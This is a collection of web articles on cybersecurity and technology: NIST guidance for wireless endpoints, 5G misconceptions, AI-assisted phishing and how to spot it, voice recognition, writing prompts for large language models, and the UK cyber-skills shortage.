If we could be more understanding, tolerant and accepting of each other, imagine what a difference will might make. | <urn:uuid:85a656ac-58ce-4cd8-8b4b-936849767689> | CC-MAIN-2024-38 | https://ccgrouppr.com/blog/mental-health-awareness-you-cannot-change-your-brain/ | 2024-09-17T12:50:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00287.warc.gz | en | 0.972561 | 1,175 | 2.90625 | 3 |
Wireless technologies are revolutionizing global communication and becoming indispensable to modern society. The rapid proliferation of these technologies, particularly wireless endpoints, has introduced many security challenges that pose significant threats to national security. As critical infrastructure systems increasingly rely on wireless communication, vulnerabilities associated with wireless endpoints can lead to catastrophic disruptions, jeopardizing public safety and the stability of nations.
The National Institute of Standards and Technology (NIST) has developed a series of frameworks to guide organizations in effectively managing cybersecurity risks. Implementing these frameworks, mainly the NIST Cybersecurity Framework is crucial for enhancing the security posture of wireless endpoints and mitigating the potential threats they pose to national security.
By understanding the vulnerabilities and threats associated with wireless endpoints, organizations can develop and implement robust security measures, leveraging the guidance provided by the NIST Framework, to safeguard critical infrastructure and ensure a resilient and secure digital ecosystem for the future.
Wireless endpoints like smartphones, laptops, and IoT devices have become ubiquitous in modern society. As these devices continue to grow in number, so too do the associated security challenges. One fundamental approach to addressing these challenges is the implementation of robust cybersecurity frameworks, such as those developed by the NIST. Wireless technologies have transformed the global communication landscape and employees and companies have become co-dependent to operate efficiently. However, the widespread adoption of these technologies also presents numerous security challenges.
What is the NIST Cybersecurity Framework?
The NIST Cybersecurity Framework is a voluntary, risk-based set of guidelines to help organizations manage and reduce cybersecurity risk. The framework comprises five core functions: Identify, Protect, Detect, Respond, and Recover. These functions provide a high-level, strategic view of an organization’s cybersecurity risk management, enabling it to comprehensively understand its security posture and implement adequate controls.
Applicability of the NIST Framework to Wireless Endpoints
Identify: The Identify function is the first step in understanding an organization’s wireless endpoint landscape. Organizations can better understand these devices’ potential risks and vulnerabilities by identifying and categorizing wireless endpoints. This data serves multiple purposes, such as facilitating the development of effective risk management strategies and determining the most crucial security measures to implement.
Protect: The Protect function implements safeguards to ensure wireless endpoints’ confidentiality, integrity, and availability. This may involve using encryption, secure protocols, robust authentication mechanisms, enforcing security policies and regular updates to software and firmware.
Detect: The Detect function continuously monitors wireless endpoints to identify potential security incidents. This can include monitoring for unauthorized access, suspicious network activity, or indications of malware. By detecting potential threats in real-time, organizations can respond more quickly and effectively to mitigate their impact.
Respond: The Respond function is concerned with developing and implementing incident response plans for wireless endpoint security incidents. Contingency plans should outline the specific roles of personnel responders and the necessary processes and procedures to follow during an incident. Organizations must have processes in place to guarantee they are fully equipped to handle and control security incidents related to wireless endpoints efficiently.
Recover: The Recover function focuses on restoring wireless endpoints and related systems to regular operation following a security incident. This involves the development of recovery plans, the implementation of lessons learned from previous incidents, and the establishment of communication channels to coordinate recovery efforts.
The NIST Cybersecurity Framework provides a valuable tool for organizations seeking to enhance the security of their wireless endpoints. By following the framework’s five core functions, organizations can better identify and manage the risks associated with these devices, implement appropriate security measures, and ensure a more robust security posture overall. Adopting the NIST framework concerning wireless endpoints is crucial for organizations to effectively safeguard against these technologies’ growing threats and vulnerabilities.
Wireless Endpoint Vulnerabilities
Insecure Protocols: Wireless communication relies on various protocols, such as Wi-Fi, Bluetooth, and Zigbee, to transmit data between devices. These protocols often suffer from insufficient authentication mechanisms that adversaries can exploit, leading to unauthorized access or data exfiltration.
Lack of Encryption: Encryption ensures secure communication between wireless endpoints. However, many devices still do not implement proper encryption techniques, leaving data vulnerable to interception and manipulation.
Default or Weak Credentials: Many wireless devices are manufactured and shipped with default or weak credentials, which attackers can easily exploit to gain unauthorized access. Users need to change default passwords to avoid unauthorized access.
Software and Firmware Vulnerabilities: Wireless endpoints are prone to software and firmware vulnerabilities like any other software-based system. Adversaries can exploit these vulnerabilities to compromise devices, potentially exfiltrating sensitive data.
Three Examples of Wireless Endpoint Vulnerabilities
- Insufficient Authentication Mechanisms: One common wireless endpoint security vulnerability is the implementation of weak or inadequate authentication mechanisms. Many wireless devices, including IoT devices and wireless routers, rely on default or easily guessable credentials, such as usernames and passwords, for user authentication. Additionally, some devices do not enforce the use of strong, unique passwords or multi-factor authentication (MFA) methods, making it easier for malicious actors to gain unauthorized access. Once an attacker gains control of a wireless endpoint, they may be able to compromise the confidentiality, integrity, and availability of sensitive information and launch further attacks on other connected systems.
- Unencrypted Data Transmission: Another prevalent wireless endpoint security vulnerability is the lack of encryption for data transmitted over wireless networks. If data is not encrypted, unauthorized parties may intercept or compromise the datalink. This vulnerability can lead to the exposure of sensitive information, such as personal data or intellectual property, and may facilitate unauthorized access to critical systems. To mitigate this risk, organizations should implement robust encryption protocols, such as Wi-Fi Protected Access 3 (WPA3) for Wi-Fi networks or Transport Layer Security (TLS) for web-based applications, to ensure the confidentiality and integrity of data transmitted over wireless networks.
- Outdated Software and Firmware: Outdated software and firmware on wireless endpoints pose a significant security risk, as they may contain known vulnerabilities that attackers can exploit. Manufacturers often release updates and patches to address identified security flaws; however, many wireless devices do not receive these updates automatically or on time. Some devices may even reach their end-of-life and no longer receive security updates, leaving them perpetually vulnerable. Organizations can reduce the risk of security breaches by implementing a solid patch management process. This involves updating all wireless endpoints regularly with the latest security patches and firmware, which can prevent known vulnerabilities from being exploited.
Threats to National Security
Cyber Espionage: State-sponsored threat actors can exploit wireless endpoint vulnerabilities to conduct cyber espionage operations. These operations may result in the exfiltration of sensitive government or military information, potentially undermining national security.
Critical Infrastructure Disruption: Many critical infrastructure systems, such as power grids, transportation systems, and water treatment facilities, rely on wireless communication. Attacks on these systems can result in widespread disruption and have catastrophic consequences for national security.
Mass Surveillance: The widespread adoption of wireless endpoints has made mass surveillance a significant concern. State-sponsored actors can exploit these vulnerabilities to intercept and monitor communication, eroding citizens’ privacy, and potentially suppressing dissent.
The rise of wireless endpoints has created a complex security landscape that presents numerous challenges to national security. Understanding and addressing these vulnerabilities effectively is critical to protecting the confidentiality, integrity, and availability of sensitive information and ensuring the continued resilience of national security infrastructure. Consequently, a proactive approach to securing wireless endpoints, including adopting secure protocols, encryption, and regular software updates, is essential to mitigate the risks posed by these technologies.
In conclusion, the rapidly evolving landscape of wireless endpoints and their associated security challenges necessitates a comprehensive and structured approach to securing these devices. The NIST Cybersecurity Framework offers a practical, risk-based methodology for organizations to identify, protect, detect, respond, and recover from potential security incidents. By adhering to this framework, organizations can bolster the security of their wireless endpoints, mitigating the risks posed by a wide range of threats and ultimately contributing to the protection of critical infrastructure and national security interests. As technology advances and new vulnerabilities emerge, adopting robust cybersecurity frameworks like the NIST Cybersecurity Framework will remain essential in fostering a resilient and secure digital ecosystem for the future. | <urn:uuid:30dd3bb2-4da8-403a-9eee-f9de4b94f233> | CC-MAIN-2024-38 | https://www.itveterans.com/the-role-of-the-national-institute-of-standards-and-technology-nist-framework-in-securing-wireless-endpoints/ | 2024-09-17T12:01:10Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00287.warc.gz | en | 0.911946 | 1,705 | 3.078125 | 3 |
In late 2019, IDC projected the number of 5G connections to grow to 1.01 billion by 2023, representing a compound annual growth rate of 217.2 percent compared to the 2019-2023 forecast period. While it’s still unknown how the pandemic will impact those numbers, one thing is exact: 5G will play a major role in shaping how we interact with and use connected technologies.
However, it’s shortsighted to think that 5G is the sole connectivity technology that will witness growth. As 5G deployments increase, we’ll also see a rise in alternative technologies that offer flexible, cost-effective power and low bandwidth options for IoT deployments. These technologies can be used in conjunction with 5G or singularly as the application calls for it. That means the emergence of 5G isn’t just about transforming low latency and high throughput Applications; it also represents a transformation of how traditional cellular networks interact with other communication technologies and sit within the larger ecosystem.
With so much buzz around 5G, it’s easy to forget other options out there are more suited for a vast amount of Applications. To clarify some of the confusion, let’s examine three common misconceptions about 5G to be aware of.
5G Makes Sense For All Verticals
5G was designed with two particular characteristics in mind: to bring faster speeds and connectivity to those using it. While the increased bandwidth and performance capabilities from 5G are perfectly suited for several applications, there are scenarios where the trade-offs between cost, performance, and ROI open the door for complimentary “right-size” technologies like LoRaWAN. So while 5G may be the optimal technology to support applications like video calls, which requires low latency, alternative technology like LoRaWAN is a better fit for water and gas metering where low power consumption and long-range are required.
5G Works Alone
Not all Applications are created the same, which means there’s no one size fits all approach. This is why the wireless market is comprised of a multi-radio access network strategy for connectivity solutions. 5G is the first version of new 3GPP specifications that open the standard to any communication technology, whether licensed or unlicensed or mobile, wired or fixed wireless. This means that depending on the application, the 5G ecosystem can adopt the best technology to support its needs – whether that’s LoRaWAN, 5G, 4G, Wi-Fi, BLE, or a combination of several.
5G Is Here
Research is mixed on what the pandemic means for 5G rollouts. According to an S&P Global report, Kagan’s 2020 global 5G survey of more than 70 mobile operators found that 38 percent of respondents are already offering 5G service, with an additional 36 percent planning 5G services during 2021. On the other hand, a PwC report found that the pandemic will delay the rollout of 5G networks in Europe by 12–to-18 months. Putting the pandemic aside, the transition from 4G to 5G was already going to take a significant time investment. Inevitably there will be industries and consumers quicker on the adoption curve, but for a vast majority of the world, the impact of 5G is still a way out. This is particularly true for rural areas where many businesses and communities don’t have reliable connectivity, let alone high-speed internet or mobile data.
As deployments become more of a reality, 5G networking will continue to be a hot topic for the wireless and IoT industries. As that happens, more attention should also be given to the complementary technologies that support 5G. As it is with most things in life, the key is choice. Consumers and businesses alike must be given options to implement the technology that makes the most sense for a given application. | <urn:uuid:0a632fbc-b8c7-40c8-8b82-b561ecf17fdb> | CC-MAIN-2024-38 | https://www.iotforall.com/three-misconceptions-about-5g | 2024-09-07T19:55:36Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00287.warc.gz | en | 0.934319 | 796 | 2.671875 | 3 |
How Artificial Intelligence Levels Up Email Phishing
Email phishing attacks — which already account for nearly 90% of all data breaches — are becoming even more pervasive and harder to detect as threat actors incorporate chatbots and other artificial intelligence (AI) tools into their strategies.
Today, bad actors are increasingly turning to generative AI writing tools like ChatGPT, Bard, and Jasper to create credible phishing emails and even efficiently translate the scams into multiple languages using free services like Google Translate.
As a result, attackers can launch these attacks en masse and at scale. These new technologies enable them to be much more efficient than they would be if they had to manually develop the entire phishing attack, giving them more time and cover to gain access to networks. Once inside, they can monetize the attack by launching lucrative ransomware and malware attacks or committing funds transfer fraud (FTF).
How is AI used in email phishing?
Before, one of the telltale signs of a phishing attack was receiving a message filled with typographical errors and poor grammar. While professional emails might contain an error here and there, most are usually well-written, so when you receive one filled with mistakes that purportedly comes from a reliable source, it should raise some red flags. In many cases, email filters will flag these types of messages as spam, preventing them from reaching unsuspecting users' inboxes in the first place.
Thanks to generative AI writing tools, however, it’s now much easier for bad actors — whose attempts have previously been thwarted by bad writing and poor grammar — to create well-written messages that are more convincing and can slip past email filters.
AI email phishing attacks at scale
Imagine, for example, a group of non-English speaking hackers gets together to launch multiple phishing scams. Since none are native English speakers, we could assume none can write well in English either.
From wherever they are in the world, using generative AI, this group can now create mostly flawless phishing messages. And they can then translate those messages into any languages they like — German, French, Italian, Chinese, and Japanese — enabling them to target more businesses across more geographies faster, all while sounding like a native speaker of each language (or at least close enough).
With this technology, hackers can cover considerably more ground. Since phishing is mostly a numbers game — hackers only need to dupe a single user to gain network access — this increases the likelihood of a successful attack.
How to spot an AI-based phishing attempt
While life may have gotten easier for hackers launching phishing attacks, that doesn't mean companies are completely out of luck. Taking a proactive approach to cybersecurity and ensuring your team knows what to look for in an attack can increase the chances bad actors don’t get inside your network.
With that in mind, here are four tactics your team can use to identify phishing attacks — and even prevent them from occurring in the first place.
1. Use the same tried-and-true tactics
Though phishing emails may no longer be riddled with grammatical errors, there are still several obvious indicators that suggest an email might be fraudulent. Employees should be skeptical of messages that lack personalization, ask you to download an attachment or click a link, imply urgency, or include requests for sensitive information. Employees should also be taught to hover over the sender’s email address to ensure it comes from a legitimate domain — not a spoofed one.
For example, a legitimate domain would be email@example.com, whereas a spoofed domain could read firstname.lastname@example.org. Another tip-off may come from security banners inserted by your organization’s IT team ('this message came from outside your organization') or by your email security platform ('be careful with this message').
2. Prioritize security awareness training
Since hackers continue to develop new attack methods — and over 95% of security incidents involve human error — organizations must prioritize security awareness training. This training will help ensure employees have the most current information about evolving threats, know what to look for in a phishing attack, and understand what to do next after they’ve received a phishing email or clicked on a suspicious link.
3. Implement robust security controls
By taking a proactive approach to cybersecurity, it’s possible to prevent phishing attacks from reaching their intended target: your employees. For example, email security suites can automatically flag risky emails, check for malicious attachments and forwarding rules, and monitor login behavior to automatically identify suspicious login attempts. Coalition Control users have access to a Marketplace of partners that offer discounted cybersecurity solutions on services such as multi-factor authentication (MFA), endpoint detection and response (EDR), free security training, phishing simulations, and more.
Additionally, companies can publish public domain name system (DNS) records — including Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain Message Authentication Reporting & Conformance (DMARC) technologies — to limit an attacker’s ability to send messages that falsely appear to be coming from your domains. They can also implement access controls like MFA, which make it that much harder for a bad actor to do their dirty work.
4. Use secure financial practices related to email
FTF claims occur when cyber criminals gain unauthorized access to a network, often via a phishing email, and then redirect or change payment information to steal funds.
To combat FTF events, implement the following best practices:
Utilize secure financial practices related to email.
Don't add or update payment information (e.g., bank account numbers, wire details) based only on an email.
Always confirm new or changed payment information using a known good contact number— avoid calling the number in the email as attackers can change these numbers or intercept them— and for large payments, require multiple team members to approve the updates.
Keeping pace with bad actors
To learn more about how phishing has evolved, keep an eye out for Coalition’s upcoming 2023 Claims Report, which analyzes how our claims and security monitoring data trends have evolved over the last six months and year over year.
Until then, watch this space for more news, security alerts, and other timely cybersecurity information, or connect directly with our Security Labs team on Twitter @CoalitionSecLab. | <urn:uuid:0ffb13a0-7791-4a1e-9501-0ac0aa96940b> | CC-MAIN-2024-38 | https://www.coalitioninc.com/en-ca/blog/artificial-intelligence-email-phishing | 2024-09-10T06:59:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00087.warc.gz | en | 0.923182 | 1,306 | 2.890625 | 3 |
Advantages and drawbacks of Voice Recognition Technology
Voice recognition achieved by VUI (Voice User Interface) is the ability for a programmed machine to respond to voice command. With the efficiency and convenience associated to the technology, it is fast becoming a way to help bridge the gap in professional task management and daily activities. Voice recognition is becoming more sophisticated and reliable, and as such, we can expect the technology to be implemented more, across many different industries. At present, consumer trends are demonstrating rapid adoption of this new capability, with many companies striving to create optimal VUI experiences. Inside Telecom has comprised a few key advantages and drawbacks of this evolving technology.
Advantages of Voice and Speech Recognition technology
Talking is faster than typing!
Voice commands are a far more efficient tool than typing a message. Advancements are being made in technology to make life easier and voice recognition is being built-in to more devices to help boost convenience and efficiency. Voice recognition software has improved and according to a study at the University of Stanford, it has become significantly faster and more accurate at producing text (through speech-based dictation on a mobile device) than we are at typing on its keyboard.
By integrating technology, such as those offered by voice solutions, businesses can streamline documentation processes, and alleviate the burden of typing and other admin tasks, enabling professionals to focus on more challenging and rewarding aspects of the job.
VUI has come a long way
VUI is constantly evolving and has come leaps and bounds from older software once produced for companies’ customer service centers. We all remember encountering a rather frustrating automated service that did not have the advanced capability of understanding or responding to our voice activation (the first time around). Today, companies have implemented more developed voice recognition software that makes interaction with a robot feel more like a conversation with a human. And deep-machine learning means VUI software is able to understand more complex and diverse word responses. This shows that researchers are going that extra mile to improve VUI devices for a way that will fit into society and our broadening scope of needs.
Voice recognition boosts productivity levels
Voice recognition and speech activation is being developed for a whole myriad of reasons. The most essential role it may have is in the workplace where it can provide support and assistance to task-management duties. Amazon’s Alexa can be used for managing and setting up conference calls as well as scheduling meetings and setting up reminders – this enables a company to streamline the process for everyone – which boosts productivity and efficiency levels.
This technology is making it possible to access big data instantly, allowing professionals to retrieve important information upon a voice command. As the technology develops, it will become commonplace to ask a question or request data for any specific case or project – taking less time than it would for us to manually search for information.
It can also streamline communication between people who speak different languages. The software has the capability of translating what is said in a foreign language into the native language for the recipient of the information to understand – which essentially helps one move beyond potential language barriers in daily business practices.
Drawbacks of voice and speech recognition
Privacy of voice recorded data
More devices are using VUI technology, which may present more challenges related to data privacy. If a device has this capability, the additional data can get tracked by the manufacturer. There have been concerns in the past that manufacturers would be capable of listening in on private conversations. This area of concern and questioning incentivized action from companies to work on offering better privacy controls for users.
Error and misinterpretation of words
Not all words are accurately interpreted with voice recognition. It is far easier for a human to decode words and turn it into meaning, than it is for voice recognition software to do so. The software’s limitation of understanding the contextual relation of words, may cause disruption to any given task assigned to the software along the way. It may encounter problems with slang words, acronyms or technical words/jargon. | <urn:uuid:da8c8b4b-0950-4054-9089-5fdff4348be5> | CC-MAIN-2024-38 | https://insidetelecom.com/advantages-and-drawbacks-of-voice-recognition-technology/ | 2024-09-11T09:09:08Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651383.5/warc/CC-MAIN-20240911084051-20240911114051-00887.warc.gz | en | 0.953451 | 812 | 2.671875 | 3 |
| Bronwen Aker //
Sr. Technical Editor, M.S. Cybersecurity, GSEC, GCIH, GCFE
Go online these days and you will see tons of articles, posts, Tweets, TikToks, and videos about how AI and AI-driven tools will revolutionize your life and the world. While a lot of the hype isn’t realistic, it is true that LLMs (large language models) like ChatGPT, Copilot, and Claude can make boring and difficult tasks easier. The trick is in knowing how to talk to them.
LLMs like ChatGPT, Copilot, and Claude are text-based tools, so it should be no surprise that they are very good at analyzing, summarizing, and generating text that you can use for various projects. Like any other tool, however, knowing how to use them well is critical for getting the positive results you want. In a recent webcast (https://www.youtube.com/watch?v=D1pIfpcEBtI), I shared some tips and tricks for using LLMs more effectively, and I’m including them here again for your use.
First, some definitions:
- Artificial Intelligence (AI): “Artificial intelligence” refers to the discipline of computer science dedicated to making computer systems that can think like a human.
- Large Language Models (LLMs): A type of AI model that can process and generate natural language text
- Models: A “model” refers to a mathematical framework or algorithm trained on vast datasets to recognize patterns, understand language, and generate human-like text based on the input it receives. These models use neural networks to process and predict information, enabling them to perform tasks such as text completion, translation, and question-answering.
- Prompt: A prompt is the input text or query given to the model to elicit a response. It guides the model’s output by providing context, instructions, or questions for the model to process and generate relevant text.
So, to summarize: LLMs are a form of AI. We use prompts to give LLMs instructions or commands. They reply with responses and/or output that resembles text that would be generated by a human. The challenge, however, is that not all prompts are created equal.
I tend to classify prompts using the following categories:
- Simple Query: A lot like a search engine query, but will usually give you more relevant results. Good for “quick and dirty” questions or tasks.
- Detailed Instruction: Includes some specifics about the task to be performed and may include some direction regarding how to render or organize the resultant output.
- Contextual Prompt: A structured prompt that includes several layers of instruction and very specific directions on how to format and organize the output.
- Conversational Prompt: Less of a single prompt and more like a conversation with another person. Great for brainstorming and/or refining ideas in an iterative manner.
This prompt is easy and is the format used by most people most of the time. All it involves is asking a simple question like, “What is the airspeed velocity of an unladen swallow?” or, “What is the ultimate answer to the ultimate question of Life, the Universe, and Everything?”
Usually, the response is more useful than what you might get from a search engine because it answers the question rather than giving you links to millions of web pages that might have the answer you are looking for.
This is a medium complexity prompt where you give the LLM more detail about what you want it to do. For example:
I need a Python script that will sort internet domains, first by TLD, then by domain, then by subdomains. The script needs to be able to deal with multiple subdomains. e.g., www.jpl.nasa.gov.
In this example, I’ve told the LLM that I want a Python script, and I’ve given several specific criteria about how it should work. While this is better than a Simple Query, it may require more than one attempt to get output that works properly or otherwise meets your needs.
Contextual Prompts are the most involved, but defining what you want and how you want it will pay off in the end.
The Microsoft Learn website has a page about LLM prompt engineering (https://learn.microsoft.com/en-us/ai/playbook/technology-guidance/generative-ai/working-with-llms/prompt-engineering#prompt-components) that includes the following graphic showing how to craft a good contextual prompt:
Who Are You?
First, Microsoft recommends providing “Instructions.” I like to call it “defining the persona” that you want the LLM to adopt for the purposes of this task. Doing so sets the stage for a lot of things, from the field of study to the voice or other “standards” that may be applicable, depending on the subject involved.
Here are some examples:
You are an advanced penetration tester who is adept at using the Kali Linux penetration testing distribution. You know its default tools, and you know many ways to optimize ethical hacking commands that may be used during a pentest. You are able to speak with other geeks, with C-Suite executives, and everyone in between.
You are an expert chef who specializes in easy-to-make meals for families that have several children. Whenever possible, you strive to balance good nutrition with convenience in preparing meals that everyone in the household can enjoy. Your tone is light and informational, encouraging others to prepare meals that are tasty, economic, and don't take a huge amount of time to make.
You are a friendly and imaginative storyteller who loves creating engaging and comforting bedtime stories for young children aged up to 6 or 7 years old. Your stories are designed to be soothing, filled with gentle adventures, and often feature relatable characters, animals, and simple lessons that encourage social behavior.
Note: When in doubt, more instruction is better.
Next comes what Microsoft calls “task-specific knowledge.” This is where you set the stage for the subject matter involved. Obviously, you can be as detailed as you want.
Guidance provided should be appropriate for ethical hackers, cybersecurity researchers, and other infosec professionals who may be engaged in penetration tests.
Meals should be designed to appeal to both adults and children, with options for picky eaters and variations to accommodate dietary restrictions or preferences. The goal is to help busy parents prepare delicious and healthy meals that the whole family can enjoy together.
Stories should be age-appropriate, free of any frightening or overly complex content, and aim to inspire a sense of wonder and security as children prepare to sleep.
Examples to Follow/Emulate
Providing an LLM with an example to follow is incredibly important. Because LLMs and other AIs are not *actually* intelligent, they have no way of knowing what you want unless you tell them, specifically and in great detail. (This applies to people, too, but that’s a different blog post. 😉 )
The examples you provide will not only serve as templates the LLM can follow, but they give you the opportunity to include any specific details, formatting conventions, etc., that you want in the final product. Think of it as setting the LLM up for success.
Run the Nmap Command:
Execute the following command in your terminal to perform a basic TCP SYN scan (-sS) on the first 1000 ports (-p 1-1000) of the target IP address 192.168.1.1:
`nmap -sS -p 1-1000 192.168.1.1`
Explanation of Command:
`nmap`: The command to run Nmap.
`-sS`: Performs a TCP SYN scan, which is a quick and stealthy method to scan ports.
`-p 1-1000`: Specifies the range of ports to scan (ports 1 through 1000).
`192.168.1.1`: The target IP address to scan. Replace this with the actual IP address of your target.
Crockpot Chicken and Vegetables
4 boneless, skinless chicken breasts
4 large carrots, peeled and cut into chunks
4 potatoes, peeled and cut into chunks
1 onion, chopped
3 garlic cloves, minced
1 cup chicken broth
1 teaspoon dried thyme
1 teaspoon dried rosemary
Salt and pepper to taste
Place the chicken breasts in the bottom of the crockpot.
Add the carrots, potatoes, onion, and garlic on top of the chicken.
Pour the chicken broth over the ingredients.
Sprinkle the thyme, rosemary, salt, and pepper over everything.
Cover and cook on low for 6-8 hours, or until the chicken and vegetables are tender.
Serve the chicken and vegetables directly from the crockpot, and enjoy a hearty, no-fuss dinner with minimal cleanup.
Note: If you want the recipes to be more accessible to international readers, consider including both metric and imperial measurements in your example.
The Adventures of Timmy and the Magic Tree
Once upon a time, in a little village nestled at the edge of a big, enchanted forest, there lived a boy named Timmy. One sunny afternoon, Timmy decided to explore the forest, where he discovered a magical tree that sparkled with colorful lights. The tree spoke to him in a gentle voice, "Hello, Timmy! I grant one wish to every child who finds me." Timmy thought carefully and wished for the ability to talk to animals. Suddenly, he heard a chorus of happy voices as the forest animals gathered around, eager to chat and share their stories. From that day on, Timmy had new friends and endless adventures in the enchanted forest, always returning home with wonderful tales to share.
And every night, as he drifted off to sleep, Timmy dreamt of the magical tree and the delightful conversations he would have the next day.
Question or Task Request
Once you have established the context, it’s time to make the actual ask of your LLM, telling it what you want it to do. The work you’ve invested in setting the stage will pay off in much more reliable results, but you may need to tweak and refine things a bit. This isn’t necessarily a bad thing, however.
Even if you set the stage extensively and gave detailed examples and instructions, the LLM is not going to say things exactly the way you would. Don’t hesitate to tweak the output, adjusting word choices, punctuation, or formatting to add your own personal stamp to things.
I think of it like this: When I bake, I start with a box mix, but I add extra goodies to enhance what is already there. It may be something as minor as adding extra cinnamon to a banana bread mix, or almond extract to poppy seed muffins. Or it could be something more extensive like including orange juice and pudding mix to a chocolate cake batter.
At the end of the day, anything you publish is your responsibility, regardless of what tools you leveraged to generate the final product. Invest the time to make sure that what you post, print, or publish says what you want to say and in the way you want to say it. LLMs like ChatGPT, Copilot, Claude, Ollama, etc., are there to *help* you, not replace you, no matter what the media and overzealous upper managers may think.
For me, conversational prompts are where LLMs really shine because it feels less like work and more like I’m chatting with my own personal mentor, tutor, or subject matter expert. Much as what happens when discussing things with another human, having a conversation with ChatGPT or some other LLM is an iterative, evolutionary process. As the conversation progresses, it evolves, refining the focus or direction of what is being discussed.
There is another, very important reason that I like chatting with ChatGPT.
LLMs are non-judgmental. They don’t criticize, patronize, or make me feel less than adequate when I ask questions or need clarification. That makes LLMs extremely effective when learning new material or subjects.
As someone who has worked for decades in various aspects of information technology, I know very well that, while there are many people who will share what they know with others freely and with lots of encouragement, there are enough people in IT who see asking questions as a sign of ignorance and incompetence. Instead of seeing questions as a desire to learn and become more capable, they are seen and treated as weakness, and the questioner is branded as being unqualified and incapable.
This negative attitude can be especially daunting for people who are just starting in a new job role or career track, as well as for women, people of color, neurodivergents, and other minority groups. Luckily, LLMs don’t care about those things, and they have tons of information that you can use to improve your knowledge and skills.
At the End of the Day…
As I said before, anything you publish, print, post, or share through other means is ultimately *your* responsibility, regardless of what tools you leveraged to generate the final product. Moreover, LLMs are new technology. They get things wrong, have “hallucinations” where they make things up, and sometimes go in completely wrong directions. That means you have to be the “adult,” supervising their work and ensuring that the final product is accurate and appropriate.
The more you work with LLMs like ChatGPT, Copilot, Claude, Ollama, etc., the better you will be at avoiding pitfalls or course-correcting when they happen.
Knowledge is power, and I hope the information I shared here will help you to embrace your inner superhero.
Additional References and Resources
- ChatGPT: https://chatgpt.com
- Copilot: https://copilot.microsoft.com/
- Claude: https://www.anthropic.com/claude
Tools to Run LLMs Locally
Other Fun Toys!
- Fabric: https://github.com/danielmiessler/fabric
- Sudowrite: https://www.sudowrite.com/
- Lore Machine: https://www.loremachine.world
Getting started with LLM prompt engineering
- Network Chuck https://www.youtube.com/@NetworkChuck
Ready to learn more?
Level up your skills with affordable classes from Antisyphon!
Available live/virtual and on-demand | <urn:uuid:cc5678b0-ef1e-442b-a0b4-57b4c0e1817f> | CC-MAIN-2024-38 | https://www.blackhillsinfosec.com/crafting-the-perfect-prompt/ | 2024-09-12T15:56:23Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00787.warc.gz | en | 0.929887 | 3,102 | 3.296875 | 3 |
The almost complete reliance on the internet has meant that everything from economic vitality to national elections are affected by the changing landscape of cyber space.
The global dependence on this infrastructure has exposed a plethora of vulnerabilities that are being exploited on a daily basis by criminal groups, lone cyber attackers and state-sponsored actors.
Increasingly, it is the business sector that is now taking the brunt of their attacks.
This concentration of cyber-attacks on a single sector has been well documented in government research into cyber security.
Findings from the 2016 Cyber Security Breaches Survey revealed that two thirds of big businesses have been the victim of a cyber-attack in the past year alone, with the cost of some these breaches reaching into the millions of pounds.
>See also: Britain’s cyber security gap…it’s bad
Across the globe, corporate executives and board members have ranked cyber threats as the third highest risk to their businesses, behind that of customer loss and taxation. Just as worrying is the increasing number of attacks on smaller enterprises.
According to statistics released by internet security firm Symantec, 43% of the global attacks logged during 2015 were against small firms – a figure that is increasing year-on-year.
The increase in attacks comes down to a number of contributing factors. Companies now store a wealth of customer and employee data, yet too many of these companies still lack a security infrastructure that can competently defend against internal or external breaches.
Critical information is being protected by weak security; an opportunity that is too good to pass up for most cyber criminals.
Implementing business-wide cyber security processes and technology is costly and requires experts with the experience and knowledge to carry out effectively.
However, the IT security skills gap has created a drought that is affecting the industry’s ability to build the workforce of cyber defenders so urgently needed.
>See also: Cybersecurity brain drain: the silent killer
There is now a severe vacuum of man-power. The (ISC)2 Global Information Security Workforce Study predicts there will be a shortage of 1.5 million information security professionals by 2020. This shortfall is having a knock-on effect that is directly impacting how businesses can respond to cyber-attacks.
One in five organisations throughout the public and private sector admitted that it could take between eight days and eight weeks to repair the damage from a cyber-attack. Nearly half (45%) blamed the lack of qualified staff.
The nature of cyber threats affecting businesses are often specific and certain skills are in high demand, requiring training to develop them. Despite this, Government research has indicated that only 17% of businesses have invested in cyber security training in the last 12 months.
With the alarming rise in cyber-attacks against UK companies, the Government has quickly come to terms with the critical vulnerability the IT security skills gap is creating for the country’s economic security.
It is now backing initiatives that are enabling businesses to work collaboratively with the cyber security industry to recruit, train and develop IT security professionals.
The Cyber Security Challenge UK works with the government to provide one such initiative. Collaborating with UK businesses and cyber security firms, the initiative aims to find individuals with the appropriate skills and inspire them to pursue a career in the industry.
Similarly, a collaborative cyber security education scheme between government and industry has been launched which allows potential employers to track student’s progress – helping them transition straight into a career in the industry.
Schemes such as these offer a platform through which businesses can unearth and develop the UK’s cyber security talent. This is achieved by providing a gateway through which these businesses can witness this talent first-hand and fast-track it directly into cyber security roles.
This is proving vital for the cyber security industry as the school syllabus and the majority of university courses do not teach the basics of computer security.
This means the stream of talented graduates most industries have become used to hiring from does not exist for the cyber security sector. UK businesses therefore need to take it upon themselves to invest in the training and education of a skilled cyber security workforce.
Over the past few years this has started to become a reality. The UK is becoming more effective at contending with these threats as more and more companies invest in cyber security through collaborative projects and initiatives.
However, the lack of a well-trained workforce, coupled with the blistering pace of technological advancement, still poses a dire threat to UK businesses.
Trained professionals are the best line of defence when it comes to opposing this threat and investment in education and training will be key to achieving the number of professionals needed.
Sourced by Dr Robert L Nowill, chair of the board at the UK Cyber Security Challenge | <urn:uuid:3a68bdfa-a160-400a-9b8c-1a73e21c8033> | CC-MAIN-2024-38 | https://www.information-age.com/talent-drought-cyber-attacks-businesses-3965/ | 2024-09-12T15:56:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00787.warc.gz | en | 0.965777 | 963 | 2.734375 | 3 |
